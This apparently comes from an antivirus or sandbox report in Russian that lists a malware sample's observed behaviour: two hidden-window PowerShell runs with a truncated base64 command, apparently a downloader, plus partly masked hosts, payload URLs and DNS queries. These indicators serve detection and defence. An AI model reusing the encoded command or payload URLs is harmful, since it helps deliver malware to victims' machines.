Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABOADcAMgAwADEAXwA9ACgAJwBjADcANwAnACsAJwBfADcAOQAnACkAOwAkAGkAOQA1AF8AMQA5ADgAXwA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpADUAMwA4ADEAMgAyADgAPQAoACcAaAAnAC...
- '35.##4.251.94':80
- 'fo####mafound.org':80
- 'po###irale.com':80
- 'ed##nta.com':80
- 'ed##nta.com':443
- http://fo####mafound.org/wvvw/unKeiHfM4yykPTCnP
- http://po###irale.com/88IIx8tsZCiqB
- http://ed##nta.com/wp-content/rDaOutqPT8a
- 'ed##nta.com':443
- DNS ASK fo####mafound.org
- DNS ASK po###irale.com
- DNS ASK sa###tgroup.ir
- DNS ASK ed##nta.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABOADcAMgAwADEAXwA9ACgAJwBjADcANwAnACsAJwBfADcAOQAnACkAOwAkAGkAOQA1AF8AMQA5ADgAXwA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpADUAMwA4ADEAMgAyADgAPQAoACcAaAAnAC...' (со скрытым окном)